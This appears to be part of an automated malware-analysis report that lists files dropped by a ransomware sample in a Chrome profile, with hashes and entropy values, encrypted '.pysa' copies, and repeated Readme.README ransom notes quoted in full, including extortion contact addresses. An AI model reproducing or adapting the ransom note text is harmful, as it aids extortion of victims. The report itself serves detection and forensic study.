                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999792538762337
                  Encrypted:true
                  SSDEEP:24576:p0md8Nq3RzoE2Cu5X9oOm1ymXjHLsro5MKoXGEThwLEZYuqT:jwCCeOlMjn7oX1hXZYnT
                  MD5:D1585A317F91FBF8A711B69EE1839095
                  SHA1:9B1037BB017463686BA8870D561299A29B9E9221
                  SHA-256:5516BF3BD69076348AE3D735A99D691F245F70F31AE124009720CBAA5D19BABD
                  SHA-512:AC05A8D88570A17021DB67AF2833DC369C62C929215EA9907547BD639B526D027B5E2C7E3DC080DF3B2766DCC9141567C548B36AD663F0F181A74FEDB07F8CFB
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998433956403327
                  Encrypted:true
                  SSDEEP:6144:s6huppe08G4JbABE9HmX6V9dW3k2BZnBNimXGc:1h2e08G4RMExw6E3z3Nixc
                  MD5:F6B81A2421CFC3DBA11164E18FD4AD6C
                  SHA1:F1FA6071FB0F3B6D9FFCC136502CEB8DD3FA19C2
                  SHA-256:D44E6CC2E5FADA451174E46ECB238B2AB06192F4685AE8083B8F5DB9893C1B45
                  SHA-512:9AA522D147AF0C4B2428E5B457C4DAE97A314E704574D376730C01E762773571573893DFFD7FB28D35CC778C6D1CE73A10378ED8481AF3C3BC51CE878BBF7E42
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\craw_window.css.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.056953429529619
                  Encrypted:false
                  SSDEEP:48:OnRKvxK7g0pcTe3hE8vCT/r3t1bCaMMIq5zHKMAHLq7KPfJQnFb/qN4:nxKM798vCT/r3tcIsPrq7KXJQFjW4
                  MD5:8E3149E8DDAA6A57E70B154EA4E8F3FE
                  SHA1:BB6E32345CA287D07B4A17CE2874FE4D8C87C8E3
                  SHA-256:0FC27051B85BD7FF28B9328FE762C9E6C7BA845E7C447F863881AA1702732123
                  SHA-512:9952D4C5902368BFEDA321BEE26F7C51705FA6D949F00C355684A68E8B5DF2BC215E713F84A790C6CD36AED7CBCBDAA23DC8431ED58891E9B570764ABDCD99F3
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):71680
                  Entropy (8bit):7.989597473670959
                  Encrypted:false
                  SSDEEP:1536:OaYLklPktIWovXO2fBT2rQ5hEOpKBTqZIgZg92rbW7fgwGs:OQKtIWo/O2cAhEkIN92rbW7fX
                  MD5:B2A3B824910A4373A4E05D4902AC0890
                  SHA1:8A5C11FF2952EBEDE67A70CC6B265175A696E2FF
                  SHA-256:993FCCD187BBB88AB38C1A3131565E431D0F7311A3EBB477912E6CAB283148D2
                  SHA-512:8E285D450AEA1CD9411A23E49858A4F3393A80D51C38AE6325E79C89FD93325AC968316297433EB58BB73633CA2C7BB6B45475E94A013F4063DC08EC8691C76D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.360079901163943
                  Encrypted:false
                  SSDEEP:96:+3gGRtxdbJh1LYNKpzmuLeSUXLVO0mIXARBBwD2ODU9/TATUT8fOb14xQC+2mt8M:+Q4xdbJhpYN0zmuLeSULVOZI8BwKL/Tp
                  MD5:C9CDF97183716337E1C96D34F47C42FB
                  SHA1:5C9B96989FBA519FD8208251DFFADB32B7F00D74
                  SHA-256:31367A4105004EEAFD7EA6D3E0E129EB779148C6F8B719CE24D40F791F41D857
                  SHA-512:DB1323C9D9910D50606DD62AFFA4D74A5797B92F38B2A0CC49132C3D6537F1C8279C351010F749B7A558B9930D10426927B7EE1ED878845C07CC0920ED804254
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\manifest.json.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061388837168621
                  Encrypted:false
                  SSDEEP:48:MQE5Bn9l7TzxauC+LjFJf4Sv76SeNOHiSCgURoDRKN7oQQj1KVPFaWdxobNjwXg7:MQEbn9l7XxacfXQSOBRgUdN7oQqgQWd+
                  MD5:5F98F002E1AB5D911B8D365F2FA8C471
                  SHA1:64C86183D6CC13D3762A0F0D8378D6F0F97B67A9
                  SHA-256:C69BD65D0BDF06ACF8B9ECE166E210A468977FD4E10954E3F376F48A9263A358
                  SHA-512:35E8D679539ADB3C31ADAE5412156FC551CDB6C540B88F4898F5E8E92734FDF29060BF0C04DF6B142EB7FC2B336A5F1401D4ABF45F2353BA0D6A1DCFBD37423D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):7.591320157280332
                  Encrypted:false
                  SSDEEP:192:mj7ldbVc3sGpaabiAaVdV1tRe7GhgdAptFA+uHgTwxxyG8:mvldbVc8GkaFaVdV/hgiG+UxxyH
                  MD5:DE9EB94FC07B3E73C359CD5B1F479719
                  SHA1:B22C0E4E4805B380BAD68049ED0AEE51102BB928
                  SHA-256:06A3685E2589E257A9644C223B0BBFA1208D2B2DF4B7370D23D97E8C6178B335
                  SHA-512:36222D88CA1908CA2205FC047E54CA8E6C86944198350F3F12A78D6253E312492CF4E34D6D98D001AED65941AED1F229E23C834D095CFA44350DFBF0BCCC7659
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.921559538392843
                  Encrypted:false
                  SSDEEP:384:FSrpsTAgxtaW5fUWv/Op8IAy39rRbjo5xP4litqJ0VY5Wzdm4AcoWxGIXIrC6:Fr7tasfzXOp8TarRbj2Pff6WhvjoWx10
                  MD5:123395A06DE8EDD627F5487AC046AA5A
                  SHA1:3E7837F40DA254153B1B5E9B32CD09FBE1FB28B8
                  SHA-256:0AD4699DF1B9E93A2D51E20F5AB70204A7B2E6DC7ABCBA1C6179A01B89D1E0E3
                  SHA-512:EBED0EB33BA9EC95ED1F4C507AD624F2DFC2417689ECB24271B8BE1F56F4A7279C6FB25D55E8D2A2312D3BD548DF22CCF4B1DE1E3DAF496602134FF8E440A653
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
